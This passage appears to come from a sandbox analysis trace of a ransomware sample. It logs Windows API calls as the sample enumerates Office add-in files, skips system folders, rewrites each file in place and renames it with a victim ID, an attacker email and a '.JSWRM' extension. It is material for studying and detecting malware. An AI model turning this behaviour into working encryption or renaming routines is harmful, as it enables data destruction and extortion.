Size=0x136) returned 0x24fed8 [0125.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0125.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.968] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as90.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\as90.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\as90.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24fed8 | out: hHeap=0x1e0000) returned 1 [0125.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0125.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.969] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x165b9401, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x75ab, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="db2v0801.xsl", cAlternateFileName="")) returned 1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2=".") returned 1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="..") returned 1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="...") returned 1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="windows") returned -1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="recovery") returned -1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="perflogs") returned -1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="documents and settings") returned -1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="$RECYCLE.BIN") returned 1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="system volume information") returned -1 [0125.969] lstrcmpiW (lpString1="db2v0801.xsl", lpString2="msocache") returned -1 [0125.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="db2v0801.xsl", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="db2v0801.xsl", cchWideChar=12, lpMultiByteStr=0x345e508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="db2v0801.xsl", lpUsedDefaultChar=0x0) returned 12 [0125.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="db2v0801.xsl", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="db2v0801.xsl", cchWideChar=12, lpMultiByteStr=0x345e4d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="db2v0801.xsl", lpUsedDefaultChar=0x0) returned 12 [0125.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0125.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\db2v0801.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\db2v0801.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.970] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=30123) returned 1 [0125.970] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x75a0) returned 0x278330 [0125.970] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x75a0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x75a0, lpOverlapped=0x0) returned 1 [0125.974] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.974] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x75a0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x75a0, lpOverlapped=0x0) returned 1 [0125.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0125.974] CloseHandle (hObject=0x338) returned 1 [0125.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0125.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0125.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0125.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0125.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0125.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0125.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.974] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\db2v0801.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\db2v0801.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\db2v0801.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\db2v0801.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0125.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0125.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.975] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164d461d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164d461d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164d461d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1816e, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="hive.xsl", cAlternateFileName="")) returned 1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2=".") returned 1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2="..") returned 1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2="...") returned 1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2="windows") returned -1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2="recovery") returned -1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2="perflogs") returned -1 [0125.975] lstrcmpiW (lpString1="hive.xsl", lpString2="documents and settings") returned 1 [0125.976] lstrcmpiW (lpString1="hive.xsl", lpString2="$RECYCLE.BIN") returned 1 [0125.976] lstrcmpiW (lpString1="hive.xsl", lpString2="system volume information") returned -1 [0125.976] lstrcmpiW (lpString1="hive.xsl", lpString2="msocache") returned -1 [0125.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0125.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hive.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0125.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hive.xsl", cchWideChar=8, lpMultiByteStr=0x345e508, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hive.xsl", lpUsedDefaultChar=0x0) returned 8 [0125.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0125.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hive.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0125.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hive.xsl", cchWideChar=8, lpMultiByteStr=0x345e4d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hive.xsl", lpUsedDefaultChar=0x0) returned 8 [0125.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0125.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0125.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\hive.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\hive.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.977] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=98670) returned 1 [0125.977] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18160) returned 0x2501e8 [0125.978] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x18160, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x18160, lpOverlapped=0x0) returned 1 [0125.986] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.986] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x18160, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x18160, lpOverlapped=0x0) returned 1 [0125.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.986] CloseHandle (hObject=0x338) returned 1 [0125.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0125.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0125.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0125.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x24f728 [0125.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0125.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.987] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\hive.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\hive.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\hive.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\hive.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f728 | out: hHeap=0x1e0000) returned 1 [0125.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0125.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0125.988] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x164ae360, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164ae360, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7b27, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Informix.xsl", cAlternateFileName="")) returned 1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2=".") returned 1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="..") returned 1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="...") returned 1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="windows") returned -1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="recovery") returned -1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="perflogs") returned -1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="documents and settings") returned 1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="$RECYCLE.BIN") returned 1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="system volume information") returned -1 [0125.988] lstrcmpiW (lpString1="Informix.xsl", lpString2="msocache") returned -1 [0125.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0125.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x345e508, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Informix.xsl", lpUsedDefaultChar=0x0) returned 12 [0125.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0125.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0125.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0125.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Informix.xsl", cchWideChar=12, lpMultiByteStr=0x345e4d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Informix.xsl", lpUsedDefaultChar=0x0) returned 12 [0125.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0125.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0125.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0125.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0125.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\informix.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.989] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=31527) returned 1 [0125.989] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7b20) returned 0x278330 [0125.989] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x7b20, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x7b20, lpOverlapped=0x0) returned 1 [0126.085] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.086] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x7b20, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x7b20, lpOverlapped=0x0) returned 1 [0126.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.086] CloseHandle (hObject=0x338) returned 1 [0126.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0126.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0126.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0126.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0126.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.086] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\informix.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Informix.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\informix.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.088] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.088] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41bd18eb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41bd18eb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41bd18eb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, 